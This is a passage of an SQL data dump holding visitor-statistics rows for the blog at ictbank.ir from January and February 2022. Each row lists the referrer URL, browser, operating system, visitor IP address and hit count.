(18314,'2022-01-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','138.201.222.6','000',0,3,0),
(18315,'2022-01-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.158.196.124','000',0,2,0),
(18316,'2022-01-27','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','6.3',NULL,NULL,'','188.163.73.203','000',0,1,0),
(18317,'2022-01-27','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','35.81.171.54','000',0,1,0),
(18318,'2022-01-27','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','103.224.35.55','000',0,1,0),
(18319,'2022-01-27','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','95.105.124.60','000',0,6,0),
(18320,'2022-01-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18321,'2022-01-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.194.181','000',0,1,0),
(18322,'2022-01-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.125.152','000',0,1,0),
(18323,'2022-01-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.213.54','000',0,2,0),
(18324,'2022-01-27','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','185.128.26.101','000',0,1,0),
(18325,'2022-01-27','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.85','000',0,4,0),
(18326,'2022-01-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,2,0),
(18327,'2022-01-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(18328,'2022-01-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18329,'2022-01-27','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','141.133.92.43','000',0,1,0),
(18330,'2022-01-27','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.36.71.133','000',0,1,0),
(18331,'2022-01-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(18332,'2022-01-28','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','184.72.69.15','000',0,2,0),
(18333,'2022-01-28','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','203.123.57.82','000',0,4,0),
(18334,'2022-01-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','116.203.207.186','000',0,1,0),
(18335,'2022-01-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','137.184.197.39','000',0,2,0),
(18336,'2022-01-28','http://ictbank.ir','Firefox','Windows','10.0',NULL,NULL,'','185.220.102.250','000',0,1,0),
(18337,'2022-01-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.19','000',0,2,0),
(18338,'2022-01-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(18339,'2022-01-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.82','000',0,2,0),
(18340,'2022-01-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,2,0),
(18341,'2022-01-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.56.80.65','000',0,1,0),
(18342,'2022-01-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18343,'2022-01-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.25.164.147','000',0,1,0),
(18344,'2022-01-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.66.117','000',0,1,0),
(18345,'2022-01-28','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','194.36.97.156','000',0,11,0),
(18346,'2022-01-28','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','5.157.43.121','000',0,2,0),
(18347,'2022-01-28','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','141.152.251.51','000',0,1,0),
(18348,'2022-01-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(18349,'2022-01-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(18350,'2022-01-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18351,'2022-01-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18352,'2022-01-28','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','188.40.113.31','000',0,9,0),
(18353,'2022-01-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(18354,'2022-01-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(18355,'2022-01-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','41.207.186.81','000',0,2,0),
(18356,'2022-01-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.58.108.205','000',0,2,0),
(18357,'2022-01-29','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','10.0',NULL,NULL,'','188.163.73.203','000',0,2,0),
(18358,'2022-01-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,10,0),
(18359,'2022-01-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.189','000',0,1,0),
(18360,'2022-01-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.81.229','000',0,1,0),
(18361,'2022-01-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.36.100.171','000',0,3,0),
(18362,'2022-01-29','https://webtechsurvey.com/website/ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.229.104.2','000',0,3,0),
(18363,'2022-01-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18364,'2022-01-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.247.217','000',0,1,0),
(18365,'2022-01-29','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.186.222','000',0,3,0),
(18366,'2022-01-29','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','159.65.56.191','000',0,9,0),
(18367,'2022-01-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.177','000',0,1,0),
(18368,'2022-01-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(18369,'2022-01-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,2,0),
(18370,'2022-01-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(18371,'2022-01-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18372,'2022-01-29','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.246','000',0,1,0),
(18373,'2022-01-30','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.153','000',0,2,0),
(18374,'2022-01-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18375,'2022-01-30','http://m.ictbank.ir/blog','Chrome','iOS','12.1',NULL,NULL,'','192.99.18.136','000',0,5,0),
(18376,'2022-01-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(18377,'2022-01-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','218.31.36.22','000',0,4,0),
(18378,'2022-01-30','http://82.102.9.14/blog','Chrome','Android','6.0',NULL,NULL,'','42.192.11.192','000',0,2,0),
(18379,'2022-01-30','https://www.bing.com','Chrome','Windows','6.3',NULL,NULL,'','149.129.241.118','000',0,3,0),
(18380,'2022-01-30','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','77.138.123.99','000',0,1,0),
(18381,'2022-01-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,3,0),
(18382,'2022-01-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18383,'2022-01-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.115.206','000',0,1,0),
(18384,'2022-01-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','164.90.206.15','000',0,1,0),
(18385,'2022-01-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(18386,'2022-01-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18387,'2022-01-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18388,'2022-01-30','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.237.197.167','000',0,1,0),
(18389,'2022-01-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.8','000',0,3,0),
(18390,'2022-01-30','http://www.design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.242.34.105','000',0,6,0),
(18391,'2022-01-31','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(18392,'2022-01-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','188.132.190.152','000',0,1,0),
(18393,'2022-01-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(18394,'2022-01-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.154.255.147','000',0,1,0),
(18395,'2022-01-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(18396,'2022-01-31','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,1,0),
(18397,'2022-01-31','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(18398,'2022-01-31','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','5.62.62.113','000',0,5,0),
(18399,'2022-01-31','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.160','000',0,1,0),
(18400,'2022-01-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(18401,'2022-01-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18402,'2022-01-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','197.9.148.91','000',0,1,0),
(18403,'2022-01-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.58.121.163','000',0,1,0),
(18404,'2022-01-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.145.198','000',0,1,0),
(18405,'2022-01-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,2,0),
(18406,'2022-01-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(18407,'2022-01-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(18408,'2022-01-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(18409,'2022-01-31','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','95.105.124.60','000',0,6,0),
(18410,'2022-02-01','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.15.234.148','000',0,3,0),
(18412,'2022-02-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(18413,'2022-02-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.170','000',0,2,0),
(18414,'2022-02-01','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','195.181.55.52','000',0,2,0),
(18415,'2022-02-01','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.214','000',0,6,0),
(18416,'2022-02-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18417,'2022-02-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.124.19','000',0,1,0),
(18418,'2022-02-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.144.156.201','000',0,2,0),
(18419,'2022-02-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(18420,'2022-02-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(18421,'2022-02-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18422,'2022-02-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(18423,'2022-02-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,2,0),
(18424,'2022-02-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.149.143.178','000',0,1,0),
(18425,'2022-02-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(18426,'2022-02-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.2.76.246','000',0,25,0),
(18427,'2022-02-01','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.147','000',0,2,0),
(18428,'2022-02-02','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','100.24.121.7','000',0,1,0),
(18429,'2022-02-02','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','204.48.26.148','000',0,1,0),
(18430,'2022-02-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(18431,'2022-02-02','http://ictbank.ir','Unknown','Unknown','Unknown',NULL,NULL,'','164.132.44.97','000',0,1,0),
(18432,'2022-02-02','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.225.163.215','000',0,3,0),
(18433,'2022-02-02','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','195.181.55.52','000',0,3,0),
(18434,'2022-02-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(18435,'2022-02-02','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','88.80.185.151','000',0,2,0),
(18436,'2022-02-02','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.7.5','000',0,2,0),
(18437,'2022-02-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18438,'2022-02-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,2,0),
(18439,'2022-02-02','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.26.182.170','000',0,1,0),
(18440,'2022-02-02','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.36.112','000',0,1,0),
(18441,'2022-02-02','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.51.49','000',0,1,0),
(18442,'2022-02-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','121.57.225.208','000',0,1,0),
(18443,'2022-02-02','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(18444,'2022-02-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','91.90.123.84','000',0,2,0),
(18445,'2022-02-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.10.209.46','000',0,1,0),
(18446,'2022-02-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.82','000',0,2,0),
(18447,'2022-02-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,6,0),
(18448,'2022-02-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','194.110.115.8','000',0,6,0),
(18449,'2022-02-03','https://www.google.com/','Chrome','OS X','10.14.6',NULL,NULL,'','46.137.199.103','000',0,1,0),
(18450,'2022-02-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','74.208.203.175','000',0,1,0),
(18451,'2022-02-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,12,0),
(18452,'2022-02-03','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','188.165.180.209','000',0,1,0),
(18453,'2022-02-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.115.34.254','000',0,1,0),
(18454,'2022-02-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(18455,'2022-02-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(18456,'2022-02-03','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.92.206','000',0,1,0),
(18457,'2022-02-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(18458,'2022-02-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','64.90.36.103','000',0,1,0),
(18459,'2022-02-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(18460,'2022-02-03','https://www.google.com/','Firefox','Windows','6.1',NULL,NULL,'','212.123.22.35','000',0,1,0),
(18461,'2022-02-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.198.145.97','000',0,2,0),
(18462,'2022-02-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.206.97','000',0,1,0),
(18463,'2022-02-03','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','194.163.134.34','000',0,2,0),
(18464,'2022-02-03','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','120.35.11.210','000',0,2,0),
(18465,'2022-02-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(18466,'2022-02-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(18467,'2022-02-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(18468,'2022-02-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18469,'2022-02-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(18470,'2022-02-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,18,0),
(18471,'2022-02-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18472,'2022-02-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18473,'2022-02-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','89.22.199.150','000',0,1,0),
(18474,'2022-02-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(18475,'2022-02-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','3.68.50.38','000',0,1,0),
(18476,'2022-02-04','http://ictbank.ir/blog','Unknown','iOS','11.3',NULL,NULL,'','36.32.3.87','000',0,1,0),
(18477,'2022-02-04','http://ictbank.ir','Unknown','Unknown','Unknown',NULL,NULL,'','83.216.185.77','000',0,1,0),
(18478,'2022-02-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(18479,'2022-02-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.206.54','000',0,1,0),
(18480,'2022-02-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(18481,'2022-02-04','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','99.79.146.250','000',0,2,0),
(18482,'2022-02-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(18483,'2022-02-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(18484,'2022-02-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,2,0),
(18485,'2022-02-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(18486,'2022-02-05','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','45.81.136.75','000',0,2,0),
(18487,'2022-02-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(18488,'2022-02-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,14,0),
(18489,'2022-02-05','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.242.202.208','000',0,1,0),
(18490,'2022-02-05','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','104.236.217.60','000',0,1,0),
(18491,'2022-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.91.32.92','000',0,1,0),
(18492,'2022-02-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(18493,'2022-02-05','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','185.187.86.230','000',0,2,0),
(18494,'2022-02-05','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,1,0),
(18495,'2022-02-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','67.222.39.77','000',0,1,0),
(18496,'2022-02-05','http://www.design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.26.68','000',0,1,0),
(18497,'2022-02-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','120.52.152.20','000',0,1,0),
(18498,'2022-02-05','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','117.50.110.69','000',0,1,0),
(18499,'2022-02-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(18500,'2022-02-05','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','185.174.209.11','000',0,3,0),
(18501,'2022-02-05','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.32.148.129','000',0,2,0),
(18502,'2022-02-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.68.10.135','000',0,2,0),
(18503,'2022-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.156.234','000',0,1,0),
(18504,'2022-02-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18505,'2022-02-05','http://ictbank.ir/blog','Opera','Windows','6.3',NULL,NULL,'','195.246.120.90','000',0,3,0),
(18506,'2022-02-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18507,'2022-02-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(18508,'2022-02-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(18509,'2022-02-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','137.184.207.100','000',0,1,0),
(18510,'2022-02-05','http://ictbank.ir/blog','Chrome','Android','11',NULL,NULL,'','31.2.219.249','000',0,2,0),
(18511,'2022-02-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.153.160.2','000',0,1,0),
(18512,'2022-02-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(18513,'2022-02-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,10,0),
(18514,'2022-02-06','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','77.222.122.251','000',0,1,0),
(18515,'2022-02-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,4,0),
(18516,'2022-02-06','http://ictbank.ir','Mobile Internet Explorer','Windows Phone','8.0',NULL,NULL,'','109.70.100.36','000',0,1,0),
(18517,'2022-02-06','http://82.102.9.14:80/blog','Safari','OS X','10.14.6',NULL,NULL,'','182.72.231.115','000',0,4,0),
(18518,'2022-02-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.91.32.92','000',0,1,0),
(18519,'2022-02-06','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','64.124.51.154','000',0,2,0),
(18520,'2022-02-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.68.135.181','000',0,18,0),
(18521,'2022-02-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','146.19.170.56','000',0,2,0),
(18522,'2022-02-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.34.185.118','000',0,1,0),
(18523,'2022-02-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','204.27.60.120','000',0,2,0),
(18524,'2022-02-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.217.248.254','000',0,2,0),
(18525,'2022-02-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.208.75','000',0,1,0),
(18526,'2022-02-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.177','000',0,1,0),
(18527,'2022-02-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(18528,'2022-02-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(18529,'2022-02-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(18530,'2022-02-06','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','194.163.134.34','000',0,2,0),
(18531,'2022-02-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.253.177','000',0,1,0),
(18532,'2022-02-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(18533,'2022-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.201.222.6','000',0,18,0),
(18534,'2022-02-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(18535,'2022-02-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.93.67.194','000',0,6,0),
(18536,'2022-02-07','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','194.163.134.34','000',0,2,0),
(18537,'2022-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(18538,'2022-02-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18539,'2022-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.66.111','000',0,2,0),
(18540,'2022-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.88.150.78','000',0,1,0),
(18541,'2022-02-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','14.1.103.160','000',0,1,0),
